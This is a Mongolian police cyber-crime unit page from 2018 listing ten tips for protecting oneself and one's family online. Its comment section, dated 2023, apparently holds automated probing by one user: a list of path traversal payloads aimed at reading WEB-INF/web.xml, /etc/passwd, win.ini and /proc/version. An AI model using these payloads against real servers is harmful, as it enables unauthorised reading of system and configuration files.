• Нүүр хуудас
  • Харьяа нэгжүүд
  • Холбоо барих
  • Асуулт хариулт

КИБЕР ГЭМТ ХЭРГЭЭС ӨӨРИЙГӨӨ БОЛОН ГЭР БҮЛЭЭ ХЭРХЭН ХАМГААЛАХ ВЭ?

2018-10-27
КИБЕР ГЭМТ ХЭРГЭЭС ӨӨРИЙГӨӨ БОЛОН ГЭР БҮЛЭЭ ХЭРХЭН ХАМГААЛАХ ВЭ?

Харилцаа холбооны зохицуулах хорооноос гаргасан судалгаагаар 2017 оны 12 дугаар сарын 31-ны өдрийн байдлаар манай улсад 2.910.778 интернет хэрэглэгч байгаагаас мобайл дата буюу ухаалаг гар утсаар интернет хэрэглэгч 90.21 хувийг эзэлж байна. Өрх гэр болгон интернеттэй, хүн болгон ухаалаг гар утас хэрэглэгч, интернет хэрэглэгч болсон гэхэд хилсдэхгүй.

Та аюулгүй интернет хэрэглээтэй, өөрийгөө кибер гэмт хэргийн хохирогч болох эрсдэлээс хамгаалах чадвартай байхаас гадна гэр бүлээ тийнхүү хамгаалж байх нь зүйтэй. Учир нь та өөрийн хувийн мэдээллийг цахим орчинд хамгаалах буюу зохистой хэрэглэж байж болох ч таны мэдээлэл танай гэр бүлийнхэнд байгаа тул тэд түүнийг эрсдэлд оруулж болзошгүй юм.

Кибер гэмт хэргийн аюулаас өөрийгөө болон гэр бүлээ хамгаалахад баримтлах гол зүйл бол кибер гэмт хэрэг үйлдэх этгээдтэй адилаар бодож, сэтгэх явдал юм. Өөрөөр хэлбэл, кибер гэмт хэрэгтний голчлон хэрэглэдэг арга, хэрэгслийн эсрэг арга хэмжээ авах нь зүйтэй юм. Кибер гэмт хэргээс урьдчилан сэргийлэх дараах нийтлэг 10 аргыг танилцуулъя.

Үүнд:

1. Компьютерын системээ шинэчилж байх

Кибер гэмт хэрэгтний халдлагын зүйл нь таны компьютерын цоорхойтой буюу хуучирсан систем байдаг тул түүнийгээ шинэчилж байгаарай.

2. Системийн тохиргоогоо хамгаалах

Бусад этгээд таны компьютерын системийн тохиргоог өөрчлөх буюу аюулгүй байдлыг хангасан тохиргоог алдагдуулахаас болгоомжлоорой.

3. Нэвтрэх үг буюу нууц үгээ сайжруулж, хамгаалах

Хэрэглэгчийн нэр, нэвтрэх үг, дансны нууц дугаар зэрэг нь аливаа онлайн гүйлгээ, төлбөр тооцоо болон таны хувийн мэдээлэлд байнга хэрэглэгддэг.    Иймд үсэг, тоо, бусад тэмдэгт оролцуулсан 8-аас доошгүй тэмдэгтээр нэвтрэх үгээ сайжруулж, түүнийгээ гурван сар тутамд тогтмол сольж хэвшээрэй. Мөн олон веб сайтад нэг л нэвтрэх үг ашиглах нь таныг эрсдэлд оруулах тул хэрэглэдэг үйлчилгээ, веб сайт бүрт бүртгүүлэхдээ өөр нэвтрэх үг ашиглах хэрэгтэй.

4. “Галт хана”-аа асаалттай байлгах

“Firewall” буюу галт хана гэх програм нь таны компьютерыг гэмт этгээдүүд эвдэх, мэдээлэл устгах, нэвтрэх үг, бусад нууц мэдээлэл хулгайлахаас хамгаалдаг.

5. Вирусны эсрэг программ суулгах буюу түүнийгээ шинэчилж байх

Вирус нь компьютерын хэрэглэгчийг мэдээгүй байхад түүний мэдээллийг устгах буюу хулгайлах, бусад байдлаар эрсдэлд оруулдаг тул заавал вирусийн эсрэг программ суулгаарай.

6. Хувийн мэдээллээ хамгаалах

Өнөөдөр ихэнх онлайн үйлчилгээг ашиглахын тулд нэр, гэрийн хаяг, утасны дугаар, и-мэйл хаяг зэрэг хувийн мэдээллээ хуваалцах, түгээх нөхцөл бүрдсэн байна. Эргэлзээтэй буюу хэлний дүрмийн алдаа ихтэй цахим шууданд хариу өгч болохгүй. И-мэйлд хариу өгөхийн өмнө цахим шуудангийн хаягийг шалгаж байх нь зүйтэй. Хувийн мэдээлэл шаардсан цахим хуудасны домэйн нэрийн урд ногоон өнгийн цоожны дүрс буюу /https/ харагдахгүй байвал та түүнийг ашиглахаас зайлсхийх нь зүйтэй.

7. Веб сайтын нууцлалын бодлогыг хэвлэн авч, анхааралтай унших

Ихэнх веб сайт үйлчилгээний нөхцөл болон нууцлалын бодлогоо бичгээр танилцуулдаг. Үүнийг анхааралтай унших нь таны хувийн мэдээлэл ямар замаар, хэнд хүрэх, эс хүрэхийг мэдэхэд чухал юм. Нөгөө талаар тухайн веб сайтын үйлчилгээ таныг эрсдэлд оруулах бол урьд хэвлэж авсан нууцлалын бодлого, үйлчилгээний нөхцөл нь таны эрхийг хамгаалахад чухал нотлох баримт болох юм.

8.Санхүүгийн мэдээлэл, дансны хуулгаа тогтмол хянах

Таны банкны дансны дугаар, нэвтрэх үг, зээлийн картын пин код хэн нэгний гарт орсон юм биш биз. Таныг мэдээгүй үед юм уу танд анзаарагдахгүйгээр таны данснаас мөнгө аваад байж мэдэх тул орлого, зарлагын мэдээллээ тогтмол хянаж байх нь санхүүгийн луйвар, залилангаас сэргийлэх, энэ тал дээр банкнаас аюулгүй байдлын дэмжлэг авах хэрэгтэй. Мөн утасны дугаараа дансны гүйлгээ хийхэд мэссэж ирэх програм сургаарай.

9. “Үнэгүй зүйл зөвхөн хавханд л байдаг” буюу танд маш их аз тохиолдоход эргэлзэн нягтлан шалгаж байх

Хэн ч АНУ-ын цэргийн өндөр албан тушаалтнаас их хэмжээний мөнгө хүлээн авах, “и-мэйл хаягийн өгөгдлийн сангаас санамсаргүйгээр сонгогдож” лотонд их хэмжээний мөнгө хожихгүй. Ийм утга бүхий зурвас, мэдэгдлүүд нь ихэнхдээ хуурагдсандаа итгэхгүй байгаа хүмүүсийн “хүчин чармайлт”-аар цагдаад мэдэгдэлгүй өнгөрч, өөр хэн нэгнийг залилахаар тарсаар байдаг.

10. Компьютероо унтраах

Хэрэглээгүй үедээ компьютероо унтрааж байх нь халдагч этгээдийн хууль бус холболтыг зогсоох үр дүнтэй нэг арга юм. Дээр дурдсан аргууд нь одоогийн төвшинд санал болгож буй аргууд бөгөөд кибер гэмт хэрэгтнүүдийн сэдэл, арга мэх улам хүчтэй болж байгаа тул дараах үйлдлийг хэвшил болгоорой.

                                                            Кибер гэмт хэрэгтэй тэмцэх хэлтэс.

e ../../../../../WEB-INF/web.xml
2023-01-30 Хариулах
e ../WEB-INF/web.xml;x=
2023-01-30 Хариулах
e ../../../WEB-INF/web.xml?
2023-01-30 Хариулах
e ../../../../WEB-INF/web.xml
2023-01-30 Хариулах
e //../....//....//WEB-INF/web.xml
2023-01-30 Хариулах
e ../../WEB-INF/web.xml?
2023-01-30 Хариулах
e /..\..WEB-INFweb.xml
2023-01-30 Хариулах
e ../../../WEB-INF/web.xml
2023-01-30 Хариулах
e ./WEB-INF/web.xml
2023-01-30 Хариулах
e ../WEB-INF/web.xml
2023-01-30 Хариулах
e ../WEB-INF/web.xml?
2023-01-30 Хариулах
e ../../WEB-INF/web.xml
2023-01-30 Хариулах
e WEB-INF\web.xml
2023-01-30 Хариулах
e //WEB-INF/web.xml
2023-01-30 Хариулах
e /static/WEB-INF/web.xml
2023-01-30 Хариулах
e ../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini
2023-01-30 Хариулах
e ������������������������������������������������windows��win.ini
2023-01-30 Хариулах
e /.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini
2023-01-30 Хариулах
e WEB-INF\web.xml
2023-01-30 Хариулах
e ../../../../../../../../../../windows/win.ini
2023-01-30 Хариулах
e file:///etc/passwd
2023-01-30 Хариулах
e ../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd
2023-01-30 Хариулах
e .\\./.\\./.\\./.\\./.\\./.\\./etc/passwd
2023-01-30 Хариулах
e /etc/passwd
2023-01-30 Хариулах
e ../../../../../../../../../../../../../../../proc/version
2023-01-30 Хариулах
e ..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg
2023-01-30 Хариулах
e ../WEB-INF/web.xml;x=
2023-01-30 Хариулах
e ../../WEB-INF/web.xml;x=
2023-01-30 Хариулах
e ../../../WEB-INF/web.xml;x=
2023-01-30 Хариулах
e ../../../../WEB-INF/web.xml
2023-01-30 Хариулах